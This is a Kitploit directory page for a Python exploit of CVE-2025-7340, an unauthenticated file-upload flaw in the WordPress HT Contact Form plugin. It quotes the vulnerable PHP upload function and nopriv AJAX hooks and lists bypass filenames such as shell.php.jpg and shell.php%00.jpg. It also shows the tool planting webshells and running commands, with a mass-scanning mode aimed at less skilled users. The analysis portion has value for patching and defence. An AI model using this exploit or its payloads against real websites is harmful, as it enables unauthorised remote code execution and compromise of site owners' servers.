Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
WordPress-HT-Contact-CVE-2025-7340-RCE — CVE-2025-7340のPythonエクスプロイト。WordPress HT Contact Formウィジェットの未認証ファイルアップロード脆弱性で、ウェブシェル展開によるリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/kai-one001/wordpress-ht-contact-cve-2025-7340-rce
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテスト
GitHubkai-one001/wordpress-ht-contact-cve-2025-7340-rce

WordPress-HT-Contact-CVE-2025-7340-RCE

CVE-2025-7340のPythonエクスプロイト。WordPress HT Contact Formウィジェットの未認証ファイルアップロード脆弱性で、ウェブシェル展開によるリモートコード実行を可能にします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
11年前未レビュー

WordPress HT Contact Form Widget | CVE-2025-7340 ファイルアップロード脆弱性分析

脆弱性の場所

脆弱性の場所:ht-contactform/admin/Includes/Services/FileManager.php 重要な関数:temp_file_upload()

1. 主な脆弱性ポイント:temp_file_upload 関数

root@kitploit:~
#63行
public function temp_file_upload($file) {
  $destination = "{$this->dir}/temp";
  $this->maybe_create_directories($destination);
  // Validate file
  $validation = $this->validate($file);
  if (!$validation['valid']) {
​    wp_send_json_error($validation['message']);
​    return;
  }

  // Process the file
  $filename = $this->process_filename($file['name']);
  $file_path = "{$destination}/$filename";
  // Move file to temporary directory
  if (move_uploaded_file($file['tmp_name'], $file_path)) {
​    wp_send_json_success([
​      'file_id' => $filename,
​      'file_name' => $file['name'],
​      'file_size' => $file['size']
​    ]);
​    return;
  }
}

2. 脆弱性の入口ポイント:AJAX 処理

ファイルの場所: ht-contactform/admin/Includes/Ajax.php:

root@kitploit:~
#46-47行
add_action('wp_ajax_ht_form_temp_file_upload', [$this, 'temp_file_upload']);
add_action('wp_ajax_nopriv_ht_form_temp_file_upload', [$this, 'temp_file_upload']);

問題: wp_ajax_nopriv_ フックが使用されており、認証されていないユーザーもファイルアップロード機能にアクセスできることを意味します。

問題の根本原因分析:

  • ファイルタイプの検証が欠如:FileManager.php の validate 関数では、PHPのアップロードエラーのみをチェックし、ファイルタイプ、拡張子、MIMEタイプの検証はまったく行われません。
  • ファイルタイプ設定が未使用:プラグインは Fields.php で許可ファイルを定義していますが、フォームレンダリング時のフロントエンド検証(accept 属性)にのみ使用され、サーバー側ではこれらの設定を検証にまったく使用していません。
  • ファイル名の処理が不十分:sanitize_file_name() は主に特殊文字を処理するだけで、危険な拡張子を防ぐことはできず、攻撃者は依然として .php、.php3、.phtml などのファイルをアップロードできます。

3. アクセス制御の問題

root@kitploit:~
// Ajax.php 第46-47行
add_action('wp_ajax_ht_form_temp_file_upload', [$this, 'temp_file_upload']);
add_action('wp_ajax_nopriv_ht_form_temp_file_upload', [$this, 'temp_file_upload']);

問題分析:

  • ログインしていないユーザーもアップロード機能にアクセスできる
  • nonce検証のみに依存しており、バイパスされる可能性がある

攻撃シナリオ

  1. 直接攻撃: 攻撃者は /wp-admin/admin-ajax.php にPOSTリクエストを直接送信でき、actionは ht_form_temp_file_upload です

  2. フロントエンド検証のバイパス: フロントエンドは accept 属性でファイルタイプを制限していますが、攻撃者は簡単にバイパスできます

  3. ファイル実行: アップロードされたPHPファイルがWebサーバーで実行され、リモートコード実行につながる可能性がある

1. 二重拡張子によるバイパス

root@kitploit:~
shell.php.jpg
shell.php.png
shell.php.gif

2. 大文字小文字によるバイパス

root@kitploit:~
shell.PHP
shell.Php
shell.pHp

3. ヌルバイトインジェクション(サーバー設定が許可する場合)

root@kitploit:~
shell.php%00.jpg

4. Pythonスクリプト

注意、URLがプラグインで公開された記事の場合にのみ有効です。そのため、スクリプトキディ機能02を追加しました。


01[単一テスト]例:

root@kitploit:~
python RCE.py -u http://192.168.162.131:8081/2025/08/04/test-0-1/

开始尝试.......
获取目标页面...
提取参数...
提取的Nonce: b05a39ff55
AJAX端点: http://192.168.162.131:8081/wp-admin/admin-ajax.php
表单ID: 6
生成webshell...
上传shell,请稍等...

[+] 漏洞利用成功!

Webshell地址: wp-content/uploads/ht_form/temp/6890c4e6f389c-shell.php

[+] 进入shell交互模式,输入'exit'退出!
shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell> exit
退出交互模式

02[ルートディレクトリテスト]例:

root@kitploit:~
python RCE.py -r http://192.168.162.131:8081
[*] 请输入日期 (默认20250804):
[*] 使用的日期: 20250804
[*] 正在扫描日期: 2025-08-04
[*] 扫描地址: http://192.168.162.131:8081/2025/08/04/
[*] 发现文章2: Test.0.1
[*] 发现文章3: 8 月 4, 2025
[*] 发现文章6: 世界,您好!
[*] 发现文章7: 8 月 4, 2025
[*] 开始漏洞利用...

[*] 正在利用: http://192.168.162.131:8081/2025/08/04/test-0-1/
开始尝试.......
获取目标页面...
提取参数...
提取的Nonce: b05a39ff55
AJAX端点: http://192.168.162.131:8081/wp-admin/admin-ajax.php
表单ID: 6
生成webshell...
上传shell,请稍等...

[+] 漏洞利用成功!

Webshell地址: wp-content/uploads/ht_form/temp/6890c53ca8d5c-shell.php

[+] 进入shell交互模式,输入'exit'退出!
shell> whoami
www-data
shell> ls
68908c7a7f86d-shell.php
68908fdbba025-shell.php
6890917c70228-shell.php
6890919055905-shell.php
689094afb2f6e-shell.php
6890977a20a7c-shell.php
689097bf2dce9-Users.txt
6890c4e6f389c-shell.php
6890c53ca8d5c-shell.php
index.php
shell> exit
退出交互模式
ツールをダウンロード